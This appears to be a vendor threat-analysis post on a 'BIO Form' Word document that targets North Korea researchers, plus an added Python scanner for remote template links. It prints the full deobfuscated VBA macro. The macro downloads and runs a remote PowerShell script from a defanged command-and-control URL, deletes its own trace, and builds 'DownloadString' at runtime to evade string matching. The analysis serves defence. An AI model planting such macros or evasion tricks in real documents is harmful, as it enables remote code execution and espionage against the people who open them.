Word Document Titled ‘BIO Form’ Being Distributed

Since last month, the ASEC analysis team has continuously published posts about APT attacks that use Word documents. Recently it found that malware of the same type is being steadily distributed under the name ‘BIO form.’ Judging from the distribution history of the previous Word documents, we can assume that this file, disguised as a biography form, also targets professors and research center directors working on North Korea-related topics.

The recently discovered file also runs a dotm file containing a malicious macro via an external link embedded in the Word document. The following shows the external link included in the ‘BIO Form (Mr. XX).docx‘ file, which was found being distributed on August 2nd.

Figure 1. External link included in ‘BIO Form (Mr. XX).docx’
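The external link shown above is an OOXML package relationship with TargetMode="External" whose type is attachedTemplate, which makes Word fetch the remote dotm. The scanner below is an added example, not ASEC code; it lists such relationships in a docx and flags remote templates. The sample package and its URL are constructed placeholders.

```python
"""List external relationships in a .docx and flag remote attachedTemplate links.

Added example (not from the ASEC post). OOXML keeps package links in
word/_rels/*.rels; an attachedTemplate relationship with TargetMode="External"
pointing at an http(s) URL is what pulls in a remote .dotm and its macros.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
TEMPLATE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                 "relationships/attachedTemplate")


def external_relationships(docx_bytes):
    """Return (rels_path, rel_type, target) for every TargetMode="External" relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    hits.append((name, rel.get("Type"), rel.get("Target")))
    return hits


def remote_templates(docx_bytes):
    """Targets of attachedTemplate relationships that point at http(s) URLs."""
    return [t for _, typ, t in external_relationships(docx_bytes)
            if typ == TEMPLATE_TYPE and re.match(r"https?://", t or "", re.I)]


def build_sample(target):
    """Constructed minimal package with one external attachedTemplate link (test fixture)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{TEMPLATE_TYPE}" Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample("http://example.invalid/BIO.dotm")  # placeholder URL
    for url in remote_templates(sample):
        print("remote template:", url)
```

To check a real document, pass the bytes of the docx to remote_templates(); a non-empty result means Word will try to load a template from the network when the file is opened.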

The downloaded BIO.dotm file contains a malicious macro, obfuscated with the same method as the previous sample. Deobfuscating the macro reveals the code shown below.

Private Sub Document_Open()
Set djfeihfidkasljf = CreateObject("Shell.Application")
dfgdfjiejfjdshaj = "powershell.exe"
dfjsdjailfksf = "C:\windows\temp\Ahnlab.log"

skdjfksjkfjkdsfj = "$fjeils={(New-Object Net.WebClient).Dring('hxxp://zenma.getenjoyment.net/ja/ng.txt')};[string]$aiwdf=$fjeils;$ndask=$aiwdf.insert(28,'ownloadst');$bmcns=iex $ndask;iex $bmcns"

Open Trim(dfjsdjailfksf) For Output As #2
       Print #2, skdjfksjkfjkdsfj
    Close #2
dfisafkdjaflkjs = "$a='C:\windows\temp\ahnlab.log';$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e"

djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfisafkdjaflkjs, "", "open", 0
Dim SngSec As Single
    SngSec = Timer + 5
Do While Timer < SngSec
Kill (dfjsdjailfksf)
End Sub

Previously, the macro ran a PowerShell command that downloaded a file directly from a certain URL. This macro instead writes the download command to the file ‘Ahnlab.log‘, launches PowerShell to read that file and execute its contents with iex, and deletes the file about five seconds later. Note that the string ‘DownloadString’ never appears in the macro: the command is written with ‘Dring’ and the missing characters are spliced in at runtime by insert(28,'ownloadst'), so simple string matching on the document does not catch it.

Figure 2. Created Ahnlab.log file

The PowerShell command executed when the Word file is opened has changed as shown below.

Figure 3. Change in process tree upon running macro (AhnLab RAPIT)

The script at hxxp://zenma.getenjoyment.net/ja/ng.txt, which is ultimately executed, performs the same function as in previous cases.

Figure 4. Malicious script downloaded through powershell

As word documents that exploit external links and target certain users are still being distributed, users need to take extra caution.

AhnLab’s anti-malware product, V3, detects and blocks the types of files above using the aliases below.

[File Detection]

  • Downloader/XML.External
  • Downloader/DOC.Agent

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
